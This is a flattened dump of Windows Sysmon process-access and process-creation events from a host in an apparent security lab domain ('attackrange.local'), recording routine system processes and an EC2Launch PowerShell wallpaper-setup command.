12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+4b1e8|C:\Windows\System32\shell32.dll+db374|C:\Windows\System32\shell32.dll+dafc8|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+4b1e8|C:\Windows\System32\shell32.dll+db374|C:\Windows\System32\shell32.dll+dafc8|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.679{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.679{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.679{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.679{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.679{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.679{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.679{266CAFBE-64E2-6064-BA00-00000000AE01}68126816C:\Windows\system32\cmd.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.676{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 10341000x80000000000000007797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.663{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.663{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.663{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565592C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565592C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565592C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565592C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.632{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.632{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.632{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.616{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.616{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.616{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.616{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.616{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.616{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 